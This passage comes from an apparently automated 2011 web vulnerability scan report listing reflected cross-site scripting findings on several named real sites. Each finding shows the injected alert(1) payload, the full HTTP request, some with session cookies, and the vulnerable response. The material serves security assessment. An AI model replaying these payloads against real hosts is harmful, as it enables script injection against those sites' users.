BF_PARTNER.gate_response6767c<script>alert(1)</script>579e3c6c8aa(1316209757);
|
4.141. http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27 [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://pglb.buzzfed.com |
| Path: |
/63857/bb0a99aabad3110617eff2ef79bb3c27 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cffa8<script>alert(1)</script>3083eeb5b42 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /63857/bb0a99aabad3110617eff2ef79bb3c27?callback=BF_PARTNER.gate_responsecffa8<script>alert(1)</script>3083eeb5b42&cb=6085 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 01:01:56 GMT
Date: Sat, 17 Sep 2011 01:01:56 GMT
Connection: close
BF_PARTNER.gate_responsecffa8<script>alert(1)</script>3083eeb5b42(1316190553);
|
4.142. http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7 [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://pglb.buzzfed.com |
| Path: |
/63857/d9dfb925d83ec9decb12af7e255ebee7 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e276d<script>alert(1)</script>39fac306275 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /63857/d9dfb925d83ec9decb12af7e255ebee7?callback=BF_PARTNER.gate_responsee276d<script>alert(1)</script>39fac306275&cb=984 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Sat, 24 Sep 2011 00:59:19 GMT
Date: Sat, 17 Sep 2011 00:59:19 GMT
Connection: close
BF_PARTNER.gate_responsee276d<script>alert(1)</script>39fac306275(1316110396);
|
4.143. http://pixel.adsafeprotected.com/jspix [anId parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://pixel.adsafeprotected.com |
| Path: |
/jspix |
Issue detail
The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8f9e"-alert(1)-"4993f914f2 was submitted in the anId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144d8f9e"-alert(1)-"4993f914f2&pubId=454&campId=179530 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A85C4E9B1CE6AFEC2478698F24E6FB3D; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:34 GMT
Connection: close
var adsafeVisParams = {
mode : "jspix",
jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0",
adsafeSrc : "",
adsafeSep : "",
requrl : "http://pixel.adsafeprotected.com/",
reqquery : "anId=144d8f9e"-alert(1)-"4993f914f2&pubId=454&campId=179530",
debug : "false",
allowPhoneHome : "false",
phoneHomeDelay : "3000",
killPhrases : "",
asid : "gt6av5mn"
};
(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="t
...[SNIP]...
|
4.144. http://pixel.adsafeprotected.com/jspix [campId parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://pixel.adsafeprotected.com |
| Path: |
/jspix |
Issue detail
The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8394"-alert(1)-"5aa455f48a3 was submitted in the campId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=454&campId=179530a8394"-alert(1)-"5aa455f48a3 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B1CD64CE4ACF13A13714A33EC4F9E56D; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:37 GMT
Connection: close
var adsafeVisParams = {
mode : "jspix",
jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0",
adsafeSrc : "",
adsafeSep : "",
requrl : "http://pixel.adsafeprotected.com/",
reqquery : "anId=144&pubId=454&campId=179530a8394"-alert(1)-"5aa455f48a3",
debug : "false",
allowPhoneHome : "false",
phoneHomeDelay : "3000",
killPhrases : "",
asid : "gt6av7iz"
};
(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I={
...[SNIP]...
|
4.145. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://pixel.adsafeprotected.com |
| Path: |
/jspix |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af364"-alert(1)-"9591c354c26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=454&campId=179530&af364"-alert(1)-"9591c354c26=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D8F12D5393B81356B131F4FF06E12958; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:37 GMT
Connection: close
var adsafeVisParams = {
mode : "jspix",
jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0",
adsafeSrc : "",
adsafeSep : "",
requrl : "http://pixel.adsafeprotected.com/",
reqquery : "anId=144&pubId=454&campId=179530&af364"-alert(1)-"9591c354c26=1",
debug : "false",
allowPhoneHome : "false",
phoneHomeDelay : "3000",
killPhrases : "",
asid : "gt6av7ya"
};
(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var o=2000;var I
...[SNIP]...
|
4.146. http://pixel.adsafeprotected.com/jspix [pubId parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://pixel.adsafeprotected.com |
| Path: |
/jspix |
Issue detail
The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a0dd"-alert(1)-"c19b890ed0c was submitted in the pubId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144&pubId=4541a0dd"-alert(1)-"c19b890ed0c&campId=179530 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FA4ADE180D50AB2EABEDD27FA7E62877; Path=/
Content-Type: text/javascript
Date: Sat, 17 Sep 2011 01:48:36 GMT
Connection: close
var adsafeVisParams = {
mode : "jspix",
jsref : "http://ad.afy11.net/ad?asId=1000007248707&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=57558110&rk1=25841281&rk2=1316239702.554&pt=0",
adsafeSrc : "",
adsafeSep : "",
requrl : "http://pixel.adsafeprotected.com/",
reqquery : "anId=144&pubId=4541a0dd"-alert(1)-"c19b890ed0c&campId=179530",
debug : "false",
allowPhoneHome : "false",
phoneHomeDelay : "3000",
killPhrases : "",
asid : "gt6av6jf"
};
(function(){var O="3.13.1";var w=(adsafeVisParams.debug==="true");var
...[SNIP]...
|
4.147. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://qa.n7.vp2.abc.go.com |
| Path: |
/crossdomain.xml |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 775ff<a>a5eff5e8762 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /crossdomain.xml775ff<a>a5eff5e8762 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]
|
Response
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:06:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5943
X-Cnection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<div id="exception">
exception 'Zend_Controller_Dispatcher_Exception' with message 'Invalid controller specified (crossdomain.xml775ff<a>a5eff5e8762)' in /data/ZendFramework-1.10.8/library/Zend/Controller/Dispatcher/Standard.php:248
Stack trace:
#0 /data/ZendFramework-1.10.8/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standa
...[SNIP]...
|
4.148. http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://qa.n7.vp2.abc.go.com |
| Path: |
/crossdomain.xml |
Issue detail
The value of REST URL parameter 1 is copied into an HTML comment. The payload 650a7--><script>alert(1)</script>b7520712271 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /crossdomain.xml650a7--><script>alert(1)</script>b7520712271 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]
|
Response
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:07:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5974
X-Cnection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 06.00.0014.2rc2 ~~~ Brandid: 001 ~~~ /crossdomain.xml650a7--><script>alert(1)</script>b7520712271 -->
...[SNIP]...
|
4.149. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://qa.n7.vp2.abc.go.com |
| Path: |
/xml/alert.xml |
Issue detail
The value of REST URL parameter 1 is copied into an HTML comment. The payload b628c--><script>alert(1)</script>5426b9bf004 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /xmlb628c--><script>alert(1)</script>5426b9bf004/alert.xml?&offset=300&201181755 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]
|
Response
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:07:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5982
X-Cnection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 06.00.0014.2rc2 ~~~ Brandid: 001 ~~~ /xmlb628c--><script>alert(1)</script>5426b9bf004/alert.xml?&offset=300&201181755 -->
...[SNIP]...
|
4.150. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://qa.n7.vp2.abc.go.com |
| Path: |
/xml/alert.xml |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37608<a>6a6ab97d218 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /xml37608<a>6a6ab97d218/alert.xml?&offset=300&201181755 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]
|
Response
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:07:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5951
X-Cnection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<div id="exception">
exception 'Zend_Controller_Dispatcher_Exception' with message 'Invalid controller specified (xml37608<a>6a6ab97d218)' in /data/ZendFramework-1.10.8/library/Zend/Controller/Dispatcher/Standard.php:248
Stack trace:
#0 /data/ZendFramework-1.10.8/library/Zend/Controller/Front.php(954): Zend_Controller_Dispatcher_Standa
...[SNIP]...
|
4.151. http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://qa.n7.vp2.abc.go.com |
| Path: |
/xml/alert.xml |
Issue detail
The value of REST URL parameter 2 is copied into an HTML comment. The payload b2040--><script>alert(1)</script>de55340569 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /xml/alert.xmlb2040--><script>alert(1)</script>de55340569?&offset=300&201181755 HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]
|
Response
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:07:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.2
Content-Length: 5956
X-Cnection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error - 404 </title>
...[SNIP]...
<!-- ~#~#VP2#~#~ Version: 06.00.0014.2rc2 ~~~ Brandid: 001 ~~~ /xml/alert.xmlb2040--><script>alert(1)</script>de55340569?&offset=300&201181755 -->
...[SNIP]...
|
4.152. http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://query.yahooapis.com |
| Path: |
/v1/public/yql/uhTrending/cokeTrending2 |
Issue detail
The value of the limit request parameter is copied into the HTML document as plain text between tags. The payload 975e8<script>alert(1)</script>8e1784da2c was submitted in the limit parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v1/public/yql/uhTrending/cokeTrending2?format=json&callback=YAHOO_one_uh.popularSearches&_maxage=1800&diagnostics=false&limit=1975e8<script>alert(1)</script>8e1784da2c HTTP/1.1
Host: query.yahooapis.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: text/javascript;charset=utf-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 00:52:26 GMT
Server: YTS/1.19.8
Age: 0
Proxy-Connection: keep-alive
Content-Length: 177
YAHOO_one_uh.popularSearches({"error":{"lang":"en-US","description":"Invalid value for variable 'limit' expecting an integer got '1975e8<script>alert(1)</script>8e1784da2c'"}}); |
4.153. http://router.infolinks.com/gsd/1316238723013.0 [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://router.infolinks.com |
| Path: |
/gsd/1316238723013.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c817e<script>alert(1)</script>328a2b755f1 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316238723013.0?callback=INFOLINKS.gsdCallbackc817e<script>alert(1)</script>328a2b755f1&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2F&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 00:50:40 GMT
Connection: close
INFOLINKS.gsdCallbackc817e<script>alert(1)</script>328a2b755f1({rid:'8539b123-083b-4c4f-88aa-0b6e254cc58a',rs:'rt1904.infolinks.com',makey:'45405e42435e4142435e4140465f414341464242404746414545405f69727076',ms:'1305',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} ); |
4.154. http://router.infolinks.com/gsd/1316238747946.0 [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://router.infolinks.com |
| Path: |
/gsd/1316238747946.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6a0db<script>alert(1)</script>537547a0793 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
